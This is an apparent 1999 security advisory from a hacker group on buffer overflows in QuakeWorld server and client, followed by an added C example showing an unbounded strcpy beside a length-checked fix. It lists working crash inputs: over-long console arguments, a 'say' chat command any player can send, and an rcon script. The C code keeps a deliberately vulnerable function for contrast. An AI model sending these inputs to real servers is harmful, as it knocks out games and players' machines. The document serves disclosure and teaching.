======================================================-[1999-10-25 UnlG]-====
                      quakeworld security advisory
                            unlimited gr0up

topic:        several buffer overflows in qwsv.exe and qwcl.exe
category:     buffer overflow (potential holes)
announced:    1999-10-25
affects:      probably all versions of QuakeWorld, including the latest, 2.33
linux only:   no. Tested on the Win32 build only, but the overflows are
              believed to be present in every build, since the same code
              handles console and rcon input everywhere
patches:      none yet
discovered:   b@$t sh()t //UnlG
=============================================================================

I. Problem description

Hi! I am very lazy, so I will not write much here. I generally do not write
much; I prefer to patch (patch the world! ;-). I do not think this is a very
serious problem, but it can still cause small ones.

OK, here are some examples.

DoS (denial of service):

  1) exec map 111111111111    - crashes the server (simple buffer overflow)
  2) exec exec 111111111111   - crashes the server (simple buffer overflow)
  3) exec echo 111111111111   - crashes the server (simple buffer overflow)
  4) exec say 111111111111    - crashes the server AND connected clients
                                (an overflow, but exactly what overflows is
                                not identified 8-). The affected client is
                                dead until the machine is rebooted. ;-)
     Note that "say" is the ordinary chat command, so unlike the console
     commands above it can be sent by any connected player.
  5) This little Quake script will crash the server. It goes through rcon,
     so it needs the server's rcon_password; run it several times (10-30):

     ----=[cut here]=----
     echo run this crap a few times (10-30)
     rcon fraglimit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
     rcon maxclients aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
     rcon sv_maxspeed aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
     rcon deathmatch aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
     rcon timelimit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
     rcon hostname aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
     ----=[cut here]=----

In every case the trigger is the same: a console command or cvar value that is
longer than the fixed-size buffer it is copied into. If you know the
rcon_password, the overflow could in principle give you a shell as the user
the server runs as (root, if it is run as root), but there is one problem:
writing working exploit code for it is difficult, and none exists yet.

II. Solution

The best solution: c:\games\the_best\quake> del .  and press Y, or contact the
id Software programmers. Until there is a patch, at least keep rcon_password
strong and unshared, since item 5 needs it; items 1 to 4 cannot be configured
away.

=============================================================================
unlimited gr0up
Web Site:                    http://infected.ilm.net/unlg/
Confidential contacts:       only "real life" chat
Non-confidential contacts:   undernet or unlg@telebot.net
PGP Key:                     I hate PGP and other crappy tools. XOR crypting
                             rules! ;-)
Security public discussion:  on packetstorm or on b1nary illusi0n
Greetz:                      all H/P/A/V scene and id Software
======================================================-[1999-10-25 UnlG]-====
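The root cause the problem description points at (a console argument or rcon
cvar value copied into a fixed-size buffer without a length check) is shown
below in a toy console-command parser. This is an added illustration written
for this page, not QuakeWorld's or id Software's code; the buffer sizes
(MAX_TOKEN, CVAR_VALUE_LEN), the cvar_t layout and every function name are
assumptions chosen for the example. It keeps the unbounded strcpy pattern for
contrast and next to it the checked version that rejects, rather than silently
truncates, the advisory's long "aaaa..." value.

```c
/* Toy QuakeWorld-style console/rcon command handling: the overflow pattern
 * beside a bounded version. Illustrative code, not the game's own source. */
#include <stdio.h>
#include <string.h>

#define MAX_ARGS        8    /* assumed limits for this toy parser */
#define MAX_TOKEN      16
#define CVAR_VALUE_LEN  8

typedef struct {
    int  argc;
    char argv[MAX_ARGS][MAX_TOKEN];
} cmd_args_t;

typedef struct {
    char name[MAX_TOKEN];
    char value[CVAR_VALUE_LEN];
} cvar_t;

/* Split one console line on spaces into bounded tokens.
 * Returns 0 on success, -1 if a token would not fit its slot or there are
 * too many tokens. A long "111111111111" or "aaaa..." argument is refused
 * here instead of being copied past the end of argv[i]. */
int cmd_tokenize(const char *line, cmd_args_t *out)
{
    const char *p = line;
    out->argc = 0;
    while (*p) {
        while (*p == ' ')
            p++;
        if (!*p)
            break;
        const char *start = p;
        while (*p && *p != ' ')
            p++;
        size_t len = (size_t)(p - start);
        if (len >= MAX_TOKEN || out->argc >= MAX_ARGS)
            return -1;                         /* would overflow */
        memcpy(out->argv[out->argc], start, len);
        out->argv[out->argc][len] = '\0';
        out->argc++;
    }
    return 0;
}

/* Vulnerable form: the copy the advisory's "rcon fraglimit aaaa..." abuses.
 * No length check, so a 54-byte value runs 46 bytes past cv->value.
 * Never called with untrusted input in this example. */
void cvar_set_unbounded(cvar_t *cv, const char *value)
{
    strcpy(cv->value, value);
}

/* Hardened form: refuse values that do not fit. Rejecting is preferable to
 * truncating, which would change a game setting without telling the admin.
 * Returns 0 on success, -1 if the value is too long. */
int cvar_set_checked(cvar_t *cv, const char *value)
{
    size_t len = strlen(value);
    if (len >= sizeof cv->value)
        return -1;
    memcpy(cv->value, value, len + 1);
    return 0;
}

/* Dispatch one console or rcon line against a single cvar.
 * Returns 0 if the line was accepted (whether or not it touched the cvar),
 * -1 if it was rejected as over-long. */
int console_exec(cvar_t *cv, const char *line)
{
    cmd_args_t a;
    if (cmd_tokenize(line, &a) != 0)
        return -1;
    if (a.argc == 2 && strcmp(a.argv[0], cv->name) == 0)
        return cvar_set_checked(cv, a.argv[1]);
    return 0;
}

int main(void)
{
    cvar_t fraglimit = { "fraglimit", "0" };
    const char *lines[] = {
        "fraglimit 20",
        "map 111111111111",
        "fraglimit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
    };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        int rc = console_exec(&fraglimit, lines[i]);
        printf("%-60s -> %s (fraglimit=%s)\n", lines[i],
               rc == 0 ? "ok" : "rejected", fraglimit.value);
    }
    return 0;
}
```

The check lives in the tokenizer as well as in the cvar setter because the
advisory's items 1 to 4 overflow on the argument itself (map, exec, echo,
say), not only on a cvar value; a single bound at one layer would leave the
other path open.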